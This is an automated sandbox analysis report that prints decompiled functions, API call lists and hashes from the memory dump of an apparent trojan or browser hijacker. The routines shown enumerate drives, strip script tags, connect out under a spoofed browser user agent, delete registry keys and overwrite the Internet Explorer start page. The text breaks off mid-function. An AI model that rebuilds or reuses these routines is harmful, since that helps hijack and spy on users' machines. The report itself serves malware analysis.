    0x004043a9
    0x004043a9
    0x004043ab
    0x004043b9

    APIs
    • GetCurrentThread.KERNEL32 ref: 00404303
    • SetThreadPriority.KERNEL32(00000000), ref: 0040430A
    • GetLogicalDrives.KERNEL32 ref: 00404323
    • GetDriveTypeW.KERNEL32(?), ref: 00404367
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 00404386
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 0040439B
    • RtlExitUserThread.NTDLL(00000000), ref: 004043AD
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Thread$ObjectSingleWait$CurrentDriveDrivesExitLogicalPriorityTypeUser
    • String ID:
    • API String ID: 97270378-0
    • Opcode ID: f86a984b63d2a962eb8d1bfc7b5ad36c3935a610374fdeb6d5248330c995d926
    • Instruction ID: b9bff0c12d6fd3fc32bf5c51f199ad95098157e0e7f7010c202028c329d301b5
    • Opcode Fuzzy Hash: f86a984b63d2a962eb8d1bfc7b5ad36c3935a610374fdeb6d5248330c995d926
    • Instruction Fuzzy Hash: 8D11D2712142009BD720AF64ED09A9B77B8EFC1711F00893BFA55D22E0D7388814DB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00404C56(intOrPtr _a4, intOrPtr _a8) {
    				signed int _v5;
    				char _v6;
    				char _v12;
    				char _v16;
    				char _v20;
    				intOrPtr _t52;
    				intOrPtr _t57;
    				signed int _t58;
    				void* _t61;
    				void* _t66;
    				void* _t69;
    				char _t71;
    				int _t72;
    				void* _t76;
    				void* _t77;
    				intOrPtr _t80;
    				char* _t82;
    				intOrPtr _t84;
    				void* _t86;
    
    				_t71 = 0;
    				_t84 = _a8;
    				_v16 = 0;
    				_v6 = 0;
    				_v20 = 0;
    				_v12 = 0;
    				if(_t84 <= 0) {
    					L43:
    					return _v12 - _t71 + _t84;
    				} else {
    					do {
    						_t80 = _a4;
    						if(_v16 == 0 ||  *((char*)(_t71 + _t80)) != 0x3e) {
    							_t52 =  *((intOrPtr*)(_t71 + _t80));
    							if(_t52 != 0x3c) {
    								if(_v16 != 0 || _v6 != 0 || _t52 == 0xd || _t52 == 0xa || _t52 == 9) {
    									goto L41;
    								} else {
    									if(_t52 != 0x26 || _t84 - _t71 <= 5) {
    										L39:
    										 *((char*)(_v12 + _t80)) =  *((intOrPtr*)(_t71 + _t80));
    										goto L40;
    									} else {
    										_t38 = _t80 + 1; // 0x1
    										if(StrCmpNIA(_t71 + _t38, "nbsp;", 5) != 0) {
    											goto L39;
    										}
    										 *((char*)(_v12 + _t80)) = 0x20;
    										_t71 = _t71 + 5;
    										L40:
    										_v12 = _v12 + 1;
    										goto L41;
    									}
    								}
    							}
    							_t57 = _v16;
    							_v16 = _v16 + 1;
    							if(_t57 != 0) {
    								goto L41;
    							}
    							_t86 = _t84 - _t71;
    							_t16 = _t80 + 1; // 0x1
    							_t82 = _t71 + _t16;
    							if(_v6 == _t57) {
    								if(_t86 <= 6) {
    									L21:
    									_v5 = 0;
    									do {
    										_t58 = _v5 & 0x000000ff;
    										_t22 = _t58 + 0x401a18; // 0x2020202
    										_t72 =  *_t22 & 0x000000ff;
    										if(_t86 <= _t72) {
    											goto L27;
    										}
    										if(StrCmpNIA(_t82,  *(0x401a08 + _t58 * 4), _t72) != 0) {
    											_t61 = 0;
    										} else {
    											_t61 = E00404C35(_t82, _t72);
    										}
    										if(_t61 != 0) {
    											_t30 =  &(("\n\n\n script")[_v5 & 0x000000ff]); // 0x200a0a0a
    											_t71 = _v20;
    											 *((char*)(_v12 + _a4)) =  *_t30;
    											goto L40;
    										}
    										L27:
    										_v5 = _v5 + 1;
    									} while (_v5 < 4);
    									_t71 = _v20;
    									goto L41;
    								}
    								if(StrCmpNIA(_t82, "script", 6) != 0) {
    									_t66 = 0;
    								} else {
    									_t76 = 6;
    									_t66 = E00404C35(_t82, _t76);
    								}
    								if(_t66 == 0) {
    									goto L21;
    								} else {
    									_v6 = 1;
    									goto L41;
    								}
    							}
    							if(_t86 > 7 &&  *_t82 == 0x2f) {
    								_t83 =  &(_t82[1]);
    								if(StrCmpNIA( &(_t82[1]), "script", 6) != 0) {
    									_t69 = 0;
    								} else {
    									_t77 = 6;
    									_t69 = E00404C35(_t83, _t77);
    								}
    								if(_t69 != 0) {
    									_v6 = 0;
    								}
    							}
    						} else {
    							_v16 = _v16 - 1;
    						}
    						L41:
    						_t84 = _a8;
    						_t71 = _t71 + 1;
    						_v20 = _t71;
    					} while (_t71 < _t84);
    					goto L43;
    				}
    			}

    0x00404c5d
    0x00404c60
    0x00404c63
    0x00404c66
    0x00404c69
    0x00404c6c
    0x00404c71
    0x00404de8
    0x00404df2
    0x00404c77
    0x00404c78
    0x00404c7c
    0x00404c7f
    0x00404c8f
    0x00404c94
    0x00404d8b
    0x00000000
    0x00404d9f
    0x00404da1
    0x00404dcc
    0x00404dd2
    0x00000000
    0x00404daa
    0x00404db1
    0x00404dbe
    0x00000000
    0x00000000
    0x00404dc3
    0x00404dc7
    0x00404dd5
    0x00404dd5
    0x00000000
    0x00404dd5
    0x00404da1
    0x00404d8b
    0x00404c9a
    0x00404c9d
    0x00404ca2
    0x00000000
    0x00000000
    0x00404ca8
    0x00404caa
    0x00404caa
    0x00404cb1
    0x00404cfa
    0x00404d29
    0x00404d29
    0x00404d2d
    0x00404d2d
    0x00404d31
    0x00404d31
    0x00404d3a
    0x00000000
    0x00000000
    0x00404d4e
    0x00404d5b
    0x00404d50
    0x00404d54
    0x00404d54
    0x00404d5f
    0x00404d73
    0x00404d7f
    0x00404d82
    0x00000000
    0x00404d82
    0x00404d61
    0x00404d61
    0x00404d64
    0x00404d6a
    0x00000000
    0x00404d6a
    0x00404d0c
    0x00404d1a
    0x00404d0e
    0x00404d12
    0x00404d13
    0x00404d13
    0x00404d1e
    0x00000000
    0x00404d20
    0x00404d20
    0x00000000
    0x00404d20
    0x00404d1e
    0x00404cb6
    0x00404ccc
    0x00404cd6
    0x00404ce4
    0x00404cd8
    0x00404cdc
    0x00404cdd
    0x00404cdd
    0x00404ce8
    0x00404cee
    0x00404cee
    0x00404ce8
    0x00404c87
    0x00404c87
    0x00404c87
    0x00404dd8
    0x00404dd8
    0x00404ddb
    0x00404ddc
    0x00404ddf
    0x00000000
    0x00404de7

    APIs
    • StrCmpNIA.SHLWAPI(00000002,script,00000006), ref: 00404CCE
    • StrCmpNIA.SHLWAPI(00000001,script,00000006), ref: 00404D04
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID: nbsp;$script
    • API String ID: 0-298180595
    • Opcode ID: fa9f9a3406222696a1b16b4978dfdeb00cdca5357d7efd5e56b331a34aa0e9c6
    • Instruction ID: dd6344b6bdd7f258133bf5287c815f08b73ca2b890df7c9639fc54c2e7955426
    • Opcode Fuzzy Hash: fa9f9a3406222696a1b16b4978dfdeb00cdca5357d7efd5e56b331a34aa0e9c6
    • Instruction Fuzzy Hash: 6951F7B0E083497ADF316FA484807BEBB75AF92304F0540BBEA61773C2C23D99469719
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E0040BFA6(void* __ecx, void* _a16, int _a20) {
    				signed int _v8;
    				char _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				void _v24;
    				intOrPtr _v36;
    				char* _v40;
    				intOrPtr _v64;
    				char* _v68;
    				void* _v84;
    				struct tagMSG _v112;
    				char _v372;
    				char _v1396;
    				void* __ebx;
    				void* __edi;
    				char* _t53;
    				void* _t65;
    				void* _t86;
    				void* _t90;
    				signed int _t91;
    				int _t94;
    
    				_v8 = _v8 | 0xffffffff;
    				_t90 = 0x3c;
    				E0040CFFE( &_v84,  &_v84, 0, _t90);
    				E0040CFFE( &_v372,  &_v372, 0, 0x104);
    				E0040CFFE( &_v1396,  &_v1396, 0, 0x400);
    				_t94 = _a20;
    				_v68 =  &_v372;
    				_v40 =  &_v1396;
    				_t53 = ( *(_t94 + 6) & 0x0000ffff) + _t94;
    				_v84 = _t90;
    				_v64 = 0x103;
    				_v36 = 0x3ff;
    				_a20 = 0;
    				if(( *(_t94 + 2) & 0x00000004) != 0) {
    					_t53 = E0040A1FF(__ecx, ( *(_t94 + 4) & 0x0000ffff) + _t94, _t53, _a16);
    					_a20 = _t53;
    				}
    				if(InternetCrackUrlA(_t53, 0, 0,  &_v84) == 0) {
    					L14:
    					E0040CF40(_a20);
    					return _v8;
    				}
    				_push( *((intOrPtr*)(_a16 + 0x420)));
    				_t86 = 2;
    				_t91 = E0040A7AC(_t86);
    				if(_t91 == 0xffffffff) {
    					goto L14;
    				}
    				_v24 = _a16;
    				_v16 =  &_v84;
    				_v20 = _t91 * 0x30 +  *0x412e10;
    				_v12 = 0;
    				_t65 = CreateThread(0, 0, E0040BDB5,  &_v24, 0, 0);
    				_a16 = _t65;
    				if(_t65 == 0) {
    					L10:
    					if(_v12 != 1) {
    						E0040A838(_t91, 0, _t91);
    					} else {
    						_v8 = 1;
    						if( *(_t94 + 0xc) > 0) {
    							E0040CF40( *0x412e14);
    							E0040CF40( *0x412e18);
    							 *0x412e14 = E0040D0D5(( *(_t94 + 0xc) & 0x0000ffff) + _t94 | 0xffffffff, ( *(_t94 + 0xc) & 0x0000ffff) + _t94);
    							 *0x412e18 = E0040D0D5(( *(_t94 + 4) & 0x0000ffff) + _t94 | 0xffffffff, ( *(_t94 + 4) & 0x0000ffff) + _t94);
    						}
    					}
    					goto L14;
    				}
    				L7:
    				while(PeekMessageW( &_v112, 0, 0, 0, 1) != 0) {
    					DispatchMessageW( &_v112);
    				}
    				if(MsgWaitForMultipleObjects(1,  &_a16, 0, 0xffffffff, 0x4bf) != 0) {
    					goto L7;
    				}
    				CloseHandle(_a16);
    				goto L10;
    			}

    0x0040bfaf
    0x0040bfb8
    0x0040bfc1
    0x0040bfd3
    0x0040bfe5
    0x0040bfea
    0x0040bff3
    0x0040bffc
    0x0040c003
    0x0040c009
    0x0040c00c
    0x0040c013
    0x0040c01a
    0x0040c01d
    0x0040c029
    0x0040c02e
    0x0040c02e
    0x0040c040
    0x0040c135
    0x0040c138
    0x0040c144
    0x0040c144
    0x0040c049
    0x0040c051
    0x0040c057
    0x0040c05c
    0x00000000
    0x00000000
    0x0040c065
    0x0040c06b
    0x0040c07d
    0x0040c08b
    0x0040c08e
    0x0040c094
    0x0040c099
    0x0040c0db
    0x0040c0df
    0x0040c130
    0x0040c0e1
    0x0040c0e1
    0x0040c0ec
    0x0040c0f4
    0x0040c0ff
    0x0040c113
    0x0040c127
    0x0040c127
    0x0040c0ec
    0x00000000
    0x0040c0df
    0x00000000
    0x0040c0a7
    0x0040c0a1
    0x0040c0a1
    0x0040c0d0
    0x00000000
    0x00000000
    0x0040c0d5
    0x00000000

    APIs
    • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0040C038
    • CreateThread.KERNEL32(00000000,00000000,Function_0000BDB5,?,00000000,00000000), ref: 0040C08E
    • DispatchMessageW.USER32(?), ref: 0040C0A1
      • Part of subcall function 0040A838: WaitForSingleObject.KERNEL32(?,000000FF,?,0040C135), ref: 0040A84E
      • Part of subcall function 0040A838: CloseHandle.KERNEL32(?), ref: 0040A857
      • Part of subcall function 0040A838: InternetCloseHandle.WININET(?), ref: 0040A8BB
      • Part of subcall function 0040A838: InternetCloseHandle.WININET(?), ref: 0040A8C4
      • Part of subcall function 0040A838: InternetCloseHandle.WININET(?), ref: 0040A8CD
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040C0B0
    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004BF), ref: 0040C0C8
    • CloseHandle.KERNEL32(?), ref: 0040C0D5
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$Internet$MessageWait$CrackCreateDispatchMultipleObjectObjectsPeekSingleThread
    • String ID:
    • API String ID: 646759295-0
    • Opcode ID: 58677598d2e85e6fa821cf41c32d8a7ddcc9de16f48001721c6e263067564d73
    • Instruction ID: bfb207915b673aee0c6acb3541c3141ec2dc537f11da44106b54937e3b60ebb1
    • Opcode Fuzzy Hash: 58677598d2e85e6fa821cf41c32d8a7ddcc9de16f48001721c6e263067564d73
    • Instruction Fuzzy Hash: F341BFB2900209EBDB10DFA5CD85AEF7BBDEB04318F00423AF515F61D0E7B889508B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E004101B0(void** __esi, WCHAR* _a4) {
    				char _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				char _v33;
    				void _v36;
    				long _v40;
    				char _v41;
    				void* _t38;
    				int _t50;
    				int _t51;
    				signed int _t53;
    				int _t54;
    				int _t57;
    				signed int _t60;
    				signed int _t61;
    				struct _OVERLAPPED* _t65;
    				struct _OVERLAPPED* _t69;
    				void** _t72;
    
    				_t72 = __esi;
    				_push(_t60);
    				_t69 = 0;
    				_v33 = 0;
    				_t38 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 2, 0);
    				_t61 = _t60 | 0xffffffff;
    				 *__esi = _t38;
    				if(_t38 != _t61) {
    					_push( &_v12);
    					_push(_t38);
    					if( *0x412c7c() == 0) {
    						_v28 = _t61;
    						_v24 = _t61;
    					} else {
    						_v28 = _v20;
    						_v24 = _v16;
    					}
    					if((_v28 & _v24) == _t61) {
    						L7:
    						CloseHandle( *_t72);
    						 *_t72 =  *_t72 | 0xffffffff;
    					} else {
    						if((_v28 | _v24) == 0) {
    							L21:
    							_t72[2] = _t72[2] | 0xffffffff;
    							_t34 =  &(_t72[3]);
    							 *_t34 = _t72[3] | 0xffffffff;
    							__eflags =  *_t34;
    							_v41 = 1;
    							E0040DCEC( *_t72, _t69, _t69, _t69);
    						} else {
    							_v20 = _t69;
    							_v16 = _t69;
    							if(ReadFile( *_t72,  &_v36, 5,  &_v40, _t69) != 0) {
    								while(1) {
    									__eflags = _v40 - _t69;
    									if(_v40 == _t69) {
    										goto L21;
    									}
    									__eflags = _v40 - 5;
    									if(_v40 != 5) {
    										L19:
    										_t50 = E0040DCEC( *_t72, _v20, _v16, _t69);
    										__eflags = _t50;
    										if(_t50 == 0) {
    											goto L7;
    										} else {
    											_t51 = SetEndOfFile( *_t72);
    											__eflags = _t51;
    											if(_t51 == 0) {
    												goto L7;
    											} else {
    												goto L21;
    											}
    										}
    									} else {
    										_t53 = _v36 ^ _t72[4];
    										asm("adc edi, [esp+0x24]");
    										_t65 = _t53 + _v20 + 5;
    										asm("adc edi, ecx");
    										_v36 = _t53;
    										__eflags = 0 - _v24;
    										if(__eflags > 0) {
    											L18:
    											_t69 = 0;
    											__eflags = 0;
    											goto L19;
    										} else {
    											if(__eflags < 0) {
    												L14:
    												__eflags = _t53 - 0xa00000;
    												if(_t53 > 0xa00000) {
    													goto L18;
    												} else {
    													_t54 = E0040DCEC( *_t72, _t53, 0, 1);
    													__eflags = _t54;
    													if(_t54 == 0) {
    														goto L7;
    													} else {
    														_v20 = _t65;
    														_v16 = 0;
    														_t57 = ReadFile( *_t72,  &_v36, 5,  &_v40, 0);
    														__eflags = _t57;
    														if(_t57 != 0) {
    															_t69 = 0;
    															__eflags = 0;
    															continue;
    														} else {
    															goto L7;
    														}
    													}
    												}
    											} else {
    												__eflags = _t65 - _v28;
    												if(_t65 > _v28) {
    													goto L18;
    												} else {
    													goto L14;
    												}
    											}
    										}
    									}
    									goto L22;
    								}
    								goto L21;
    							} else {
    								goto L7;
    							}
    						}
    					}
    				}
    				L22:
    				return _v33;
    			}

    APIs
    • CreateFileW.KERNEL32 ref: 004101D2
    • GetFileSizeEx.KERNEL32(00000000,C0000000), ref: 004101EB
    • ReadFile.KERNEL32(?,00000001,00000005,00000002,00000000), ref: 00410240
    • CloseHandle.KERNEL32(?), ref: 0041024C
    • ReadFile.KERNEL32(?,00000001,00000005,00000002,00000000,?,?,00000000,00000001), ref: 004102C7
    • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 004102F2
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Read$CloseCreateHandleSize
    • String ID:
    • API String ID: 1850650832-0
    • Opcode ID: e7b8bdbea03c0b90cf0a563e3e15f64dc6c7d9c7311ccde80ccb79861fd324d4
    • Instruction ID: 53f336cb8e835b1cfc1313064cd71cb3772c02fcdf11f1e18e9767142f57d12d
    • Opcode Fuzzy Hash: e7b8bdbea03c0b90cf0a563e3e15f64dc6c7d9c7311ccde80ccb79861fd324d4
    • Instruction Fuzzy Hash: 06417C71108341AFD720CF15CC89AABBBE8FB88754F144A2EF5E5D2290D7B4D984CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0040DC05(signed int __eax, void* __ecx, void** __esi, WCHAR* _a4) {
    				intOrPtr _v8;
    				void* _v12;
    				void* _t29;
    				void* _t30;
    				void* _t33;
    				signed int _t34;
    				void* _t37;
    				void* _t38;
    				signed int _t41;
    				signed int _t43;
    
    				_t52 = __esi;
    				_t41 = __eax;
    				asm("sbb eax, eax");
    				_t29 = CreateFileW(_a4, (__eax | 0xfffffffe) << 0x1e,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
    				__esi[2] = _t29;
    				if(_t29 == 0xffffffff) {
    					L10:
    					_t30 = 0;
    					__eflags = 0;
    				} else {
    					_push( &_v12);
    					_push(_t29);
    					if( *0x412c7c() == 0 || _v8 != 0) {
    						L9:
    						CloseHandle(_t52[2]);
    						goto L10;
    					} else {
    						_t33 = _v12;
    						__esi[1] = _t33;
    						if(_t33 != 0) {
    							_push(0);
    							_push(0);
    							_push(0);
    							_t34 = 0;
    							_t43 = _t41 & 0x00000001;
    							_t37 = CreateFileMappingW(__esi[2], 0, (_t34 & 0xffffff00 | __eflags != 0x00000000) + (_t34 & 0xffffff00 | __eflags != 0x00000000) + 2, ??, ??, ??);
    							__esi[3] = _t37;
    							__eflags = _t37;
    							if(_t37 == 0) {
    								goto L9;
    							} else {
    								__eflags = _t43;
    								_t38 = MapViewOfFile(_t37, (_t43 == 0) + (_t43 == 0) + 2, 0, 0, 0);
    								 *__esi = _t38;
    								__eflags = _t38;
    								if(_t38 != 0) {
    									goto L5;
    								} else {
    									CloseHandle(__esi[3]);
    									goto L9;
    								}
    							}
    						} else {
    							__esi[3] = 0;
    							 *__esi = 0;
    							L5:
    							_t30 = 1;
    						}
    					}
    				}
    				return _t30;
    			}

    APIs
    • CreateFileW.KERNEL32(?,00000000,?,00000000,00000003,00000000,00000000,00000000,00415FD6,?,?,?,00403A07,004124A8,?,00000006), ref: 0040DC31
    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00403A07,004124A8,?,00000006,00000000,00000000,00000000,00000000), ref: 0040DC44
    • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,00403A07,004124A8,?,00000006,00000000,00000000,00000000), ref: 0040DC7B
    • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,?,00403A07,004124A8,?,00000006,00000000,00000000,00000000,00000000), ref: 0040DC98
    • CloseHandle.KERNEL32(?,?,?,?,00403A07,004124A8,?,00000006,00000000,00000000,00000000,00000000), ref: 0040DCA7
    • CloseHandle.KERNEL32(?,?,?,?,00403A07,004124A8,?,00000006,00000000,00000000,00000000,00000000), ref: 0040DCB0
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$CloseCreateHandle$MappingSizeView
    • String ID:
    • API String ID: 2246244431-0
    • Opcode ID: 3388d37067595d39ff8123b446749441f7f00b7ceffc8c1476919370207154ac
    • Instruction ID: e07caebaef71d6f87e7cce511bf1d4a2ad3a24bcaf23e9cc1c6394225b5ac337
    • Opcode Fuzzy Hash: 3388d37067595d39ff8123b446749441f7f00b7ceffc8c1476919370207154ac
    • Instruction Fuzzy Hash: FF21A171540601BFD7244BB6CD4DD6BBBFCEBD5B10710CA2EF162D22A0F6B59944CA24
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00409F45() {
    				intOrPtr _t7;
    				intOrPtr _t9;
    				intOrPtr _t11;
    				intOrPtr _t14;
    
    				SetThreadPriority(GetCurrentThread(), 2);
    				_t7 =  *0x412a64; // 0x246f5a8
    				SHDeleteKeyA(0x80000001,  *(_t7 + 0x48));
    				_t9 =  *0x412a64; // 0x246f5a8
    				SHDeleteKeyA(0x80000002,  *(_t9 + 0x48));
    				_t11 =  *0x412a64; // 0x246f5a8
    				SHDeleteKeyA(0x80000002,  *(_t11 + 0x4c));
    				Sleep(0x3e8);
    				_t14 =  *0x412a64; // 0x246f5a8
    				return E00409266(0,  *((intOrPtr*)(_t14 + 0x2c)), 0xe, 0, 0, 0, 0);
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 00409F48
    • SetThreadPriority.KERNEL32(00000000,?,00407523), ref: 00409F4F
    • SHDeleteKeyA.SHLWAPI(80000001,?,?,00407523), ref: 00409F62
    • SHDeleteKeyA.SHLWAPI(80000002,?,?,00407523), ref: 00409F76
    • SHDeleteKeyA.SHLWAPI(80000002,?,?,00407523), ref: 00409F85
    • Sleep.KERNEL32(000003E8,?,00407523), ref: 00409F90
      • Part of subcall function 00409266: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 004092BB
      • Part of subcall function 00409266: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 004092D6
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 004092F2
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040930B
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 00409325
      • Part of subcall function 00409266: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040933E
      • Part of subcall function 00409266: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040935B
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$DeleteWrite$ReadThread$CreateCurrentHandleNamedPipePrioritySleepState
    • String ID:
    • API String ID: 2160410962-0
    • Opcode ID: 2b86e06d73e18e7ac7113de520c495c066125de6f04befc59045bf898ece4658
    • Instruction ID: f3992a0163d0facdae9a1e90cd676dc4cd94a956fbdedbe313d42d5d28f1ca03
    • Opcode Fuzzy Hash: 2b86e06d73e18e7ac7113de520c495c066125de6f04befc59045bf898ece4658
    • Instruction Fuzzy Hash: 7FF0DA72110120AFEB215FA4EE09FDA3B69EF0C351B018060FA09D61B2D7B19E60CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040D716(signed int __eax, char* __ecx) {
    				short _v28;
    				char* _v32;
    				signed int _t5;
    				void* _t12;
    				void* _t14;
    				char* _t15;
    				void* _t17;
    
    				_t15 = __ecx;
    				_t5 = __eax;
    				if(__ecx == 0) {
    					_t15 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
    				}
    				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
    				if(_t14 == 0) {
    					L7:
    					return 0;
    				}
    				_t17 = 0;
    				do {
    					_t1 = _t17 + 0x41200c; // 0x41200c
    					_t2 = _t17 + 0x412008; // 0x2
    					InternetSetOptionA(_t14,  *_t2, _t1, 4);
    					_t17 = _t17 + 8;
    				} while (_t17 < 0x18);
    				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
    				if(_t12 == 0) {
    					InternetCloseHandle(_t14);
    					goto L7;
    				}
    				return _t12;
    			}

    APIs
    • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 0040D72D
    • InternetSetOptionA.WININET(00000000,00000002,0041200C,00000004), ref: 0040D74C
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040D769
    • InternetCloseHandle.WININET(00000000), ref: 0040D775
    Strings
    • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 0040D71E, 0040D72C
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Internet$CloseConnectHandleOpenOption
    • String ID: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    • API String ID: 910987326-2068255511
    • Opcode ID: 5cb62407ca279c1d11bc98ae40beaf130e7b35d2d31ea93b2e1f4195a5cd94b4
    • Instruction ID: 86c2908caef9d1014e8a6d5efac7bcd3882bab40932dee281f1179311c2445cd
    • Opcode Fuzzy Hash: 5cb62407ca279c1d11bc98ae40beaf130e7b35d2d31ea93b2e1f4195a5cd94b4
    • Instruction Fuzzy Hash: 10F062B22022207BD7211BA19D88DEB6E5DFF497A1B004535F249E2051C2748864C7F8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E0040DB1D() {
    				char _v8;
    				struct HINSTANCE__* _v12;
    				void* _v1036;
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t15;
    				char _t22;
    				void* _t28;
    
    				_t22 = 0;
    				_t13 = LoadLibraryA("urlmon.dll");
    				_v12 = _t13;
    				if(_t13 != 0) {
    					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
    					if(_t15 != 0) {
    						_push( &_v8);
    						_push( &_v1036);
    						_push(0);
    						_v8 = 0x3ff;
    						_v1036 = 0;
    						if( *_t15() == 0) {
    							if(_v8 > 0x3ff) {
    								_v8 = 0x3ff;
    							}
    							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
    							_t22 = E0040D0D5( &_v1036 | 0xffffffff,  &_v1036);
    						}
    					}
    					FreeLibrary(_v12);
    				}
    				return _t22;
    			}

    APIs
    • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040DB2E
    • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040DB41
    • FreeLibrary.KERNEL32(?), ref: 0040DB93
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID: ObtainUserAgentString$urlmon.dll
    • API String ID: 145871493-2685262326
    • Opcode ID: 289731660acfdc2704dca370dffad9d7289ee30d0ca94e95948d0e2a9cca5f9d
    • Instruction ID: cc68811d53daa7c46d5208e031ddd80310bc59e8b37e3235756379b3f82af4a1
    • Opcode Fuzzy Hash: 289731660acfdc2704dca370dffad9d7289ee30d0ca94e95948d0e2a9cca5f9d
    • Instruction Fuzzy Hash: 350188B1D00254ABCB11AFE49D849DEBBB8AF04311F1041BBB615F3290D9749F498B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004075EF(void* __ecx, char* _a4, int _a8) {
    				void* _v8;
    				int _t13;
    
    				_t13 = 0;
    				_v8 = 0x80000001;
    				if(RegCreateKeyExA(0x80000001, "software\\microsoft\\internet explorer\\main", 0, 0, 0, 2, 0,  &_v8, 0) == 0) {
    					if(RegSetValueExA(_v8, "Start Page", 0, 1, _a4, _a8) == 0) {
    						_t13 = 1;
    					}
    					RegCloseKey(_v8);
    				}
    				return _t13;
    			}

    APIs
    • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\internet explorer\main,00000000,00000000,00000000,00000002,00000000,?,00000000,00000001,?,?,00404F5E,00000001,00000000,00000001), ref: 0040760F
    • RegSetValueExA.ADVAPI32(?,Start Page,00000000,00000001,?,?,?,?,00404F5E,00000001,00000000,00000001,!!!0-0=9-0=23434,?,00000001,3709128dk0023444), ref: 0040762A
    • RegCloseKey.ADVAPI32(?,?,?,00404F5E,00000001,00000000,00000001,!!!0-0=9-0=23434,?,00000001,3709128dk0023444,00000001,09ck_=ldfuihpfre), ref: 00407639
    Strings
    • Start Page, xrefs: 00407622
    • software\microsoft\internet explorer\main, xrefs: 00407606
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateValue
    • String ID: Start Page$software\microsoft\internet explorer\main
    • API String ID: 1818849710-2333123338
    • Opcode ID: b9f974ca60a0d3de1171d635da07ce6c59c1f364da06d1ed26a979a29a5fe33a
    • Instruction ID: 7426d8eb7775c4f579156ce562c794ed392fa071d08fe2e8c7f59205c624a875
    • Opcode Fuzzy Hash: b9f974ca60a0d3de1171d635da07ce6c59c1f364da06d1ed26a979a29a5fe33a
    • Instruction Fuzzy Hash: B4F012B1684208BFEF255F94CE86EEB776DEB14788F108425F505F11A0E2B69E50D728
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E00405CC5(void* __ecx, void* __edx, signed int* _a4) {
    				void* __edi;
    				void* __esi;
    				intOrPtr _t16;
    				_Unknown_base(*)()* _t17;
    				char* _t19;
    				void* _t23;
    				void* _t28;
    				void* _t31;
    				intOrPtr _t34;
    				intOrPtr _t37;
    				void* _t43;
